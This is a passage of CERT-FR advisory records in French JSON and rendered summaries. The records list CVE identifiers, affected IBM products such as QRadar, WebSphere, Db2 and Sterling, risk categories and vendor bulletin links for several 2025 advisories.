"url": "https://www.cve.org/CVERecord?id=CVE-2017-9047"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2024-38819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38819"
},
{
"name": "CVE-2025-27144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27144"
},
{
"name": "CVE-2022-49043",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49043"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2025-30691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30691"
},
{
"name": "CVE-2024-38809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38809"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2023-52355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52355"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-56337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56337"
},
{
"name": "CVE-2025-32997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32997"
},
{
"name": "CVE-2024-9902",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9902"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-56332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56332"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2024-38827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38827"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2025-25019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25019"
},
{
"name": "CVE-2020-35538",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35538"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2024-38828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38828"
},
{
"name": "CVE-2018-5711",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5711"
},
{
"name": "CVE-2023-1916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1916"
},
{
"name": "CVE-2025-25022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25022"
},
{
"name": "CVE-2025-25020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25020"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2022-1354",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1354"
},
{
"name": "CVE-2025-25021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25021"
},
{
"name": "CVE-2024-52304",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52304"
},
{
"name": "CVE-2023-24607",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24607"
},
{
"name": "CVE-2025-22235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22235"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-57556",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57556"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2024-50379",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50379"
},
{
"name": "CVE-2023-24056",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24056"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2024-52317",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52317"
},
{
"name": "CVE-2024-52316",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52316"
},
{
"name": "CVE-2022-3570",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3570"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0481",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-06T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7235432",
"url": "https://www.ibm.com/support/pages/node/7235432"
},
{
"published_at": "2025-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7235402",
"url": "https://www.ibm.com/support/pages/node/7235402"
}
]
}
CERTFR-2025-AVI-0337
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling Connect:Direct Web Services versions 6.1.x antérieures à 6.1.0.28 | ||
| IBM | QRadar | QRadar Suite Software versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | Cloud Pak | Cloud Pak for Security versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | QRadar | SOAR QRadar Plugin App versions antérieures à 5.6.0 |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct Web Services versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.28",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "SOAR QRadar Plugin App versions ant\u00e9rieures \u00e0 5.6.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-42459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42459"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2020-35494",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35494"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2024-23944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2020-35496",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35496"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2024-42460",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42460"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2023-45133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45133"
},
{
"name": "CVE-2025-21613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21613"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2023-25584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25584"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-29018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29018"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2018-18700",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18700"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2019-16163",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16163"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-1972",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1972"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2023-25588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25588"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-35495",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35495"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-42461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42461"
},
{
"name": "CVE-2024-29180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29180"
},
{
"name": "CVE-2019-12972",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12972"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2023-25585",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25585"
},
{
"name": "CVE-2025-21614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21614"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2020-35507",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35507"
},
{
"name": "CVE-2020-35493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35493"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2018-12699",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12699"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0337",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-18T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Injection SQL (SQLi)"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230739",
"url": "https://www.ibm.com/support/pages/node/7230739"
},
{
"published_at": "2025-04-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231169",
"url": "https://www.ibm.com/support/pages/node/7231169"
},
{
"published_at": "2025-04-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231051",
"url": "https://www.ibm.com/support/pages/node/7231051"
}
]
}
CERTFR-2025-AVI-0279
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Db2 | Db2 versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Application Server Liberty sans le correctif APAR PH65394 | ||
| IBM | Db2 Warehouse | Db2 Warehouse versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Hybrid Edition sans le dernier correctif de sécurité | ||
| IBM | QRadar Analyst Workflow | QRadar Analyst Workflow versions antérieures à 3.0.0 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Db2 versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty sans le correctif APAR PH65394",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2 Warehouse",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Analyst Workflow versions ant\u00e9rieures \u00e0 3.0.0",
"product": {
"name": "QRadar Analyst Workflow",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2021-44906",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44906"
},
{
"name": "CVE-2023-45857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45857"
},
{
"name": "CVE-2023-45142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45142"
},
{
"name": "CVE-2022-48890",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48890"
},
{
"name": "CVE-2024-35176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35176"
},
{
"name": "CVE-2024-37071",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37071"
},
{
"name": "CVE-2025-25285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25285"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2024-34997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34997"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2024-43398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43398"
},
{
"name": "CVE-2024-35946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35946"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2024-41761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41761"
},
{
"name": "CVE-2022-29153",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29153"
},
{
"name": "CVE-2023-52605",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52605"
},
{
"name": "CVE-2021-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23337"
},
{
"name": "CVE-2018-6341",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-6341"
},
{
"name": "CVE-2023-52455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52455"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-26740",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26740"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2025-25288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25288"
},
{
"name": "CVE-2024-35790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35790"
},
{
"name": "CVE-2022-48921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48921"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2025-25290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25290"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39908"
},
{
"name": "CVE-2021-47495",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47495"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2023-52832",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52832"
},
{
"name": "CVE-2024-41110",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41110"
},
{
"name": "CVE-2024-27281",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27281"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2020-13844",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13844"
},
{
"name": "CVE-2024-26776",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26776"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2024-41762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41762"
},
{
"name": "CVE-2024-39494",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39494"
},
{
"name": "CVE-2025-23184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2021-4204",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4204"
},
{
"name": "CVE-2024-26843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26843"
},
{
"name": "CVE-2024-40679",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40679"
},
{
"name": "CVE-2023-52885",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52885"
},
{
"name": "CVE-2018-20225",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20225"
},
{
"name": "CVE-2019-11253",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11253"
},
{
"name": "CVE-2023-52898",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52898"
},
{
"name": "CVE-2025-25289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25289"
},
{
"name": "CVE-2024-45663",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45663"
},
{
"name": "CVE-2023-52467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52467"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2024-36620",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36620"
},
{
"name": "CVE-2022-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48706"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0279",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230024",
"url": "https://www.ibm.com/support/pages/node/7230024"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229770",
"url": "https://www.ibm.com/support/pages/node/7229770"
},
{
"published_at": "2025-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229443",
"url": "https://www.ibm.com/support/pages/node/7229443"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229768",
"url": "https://www.ibm.com/support/pages/node/7229768"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229772",
"url": "https://www.ibm.com/support/pages/node/7229772"
}
]
}
CERTFR-2025-AVI-0452
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Security QRadar EDR | Security QRadar EDR versions 3.12.x antérieures à 3.12.17 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere Service Registry and Repository | WebSphere Service Registry and Repository versions 8.5.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere | WebSphere Application Server versions 8.5.x sans le correctif PH66499 ou antérieures à 8.5.5.28 (correctif prévu au troisième trimestre 2025) |
References
| Title | Publication Time | Tags | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Security QRadar EDR versions 3.12.x ant\u00e9rieures \u00e0 3.12.17",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository versions 8.5.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere Service Registry and Repository",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 8.5.x sans le correctif PH66499 ou ant\u00e9rieures \u00e0 8.5.5.28 (correctif pr\u00e9vu au troisi\u00e8me trimestre 2025)",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-45641",
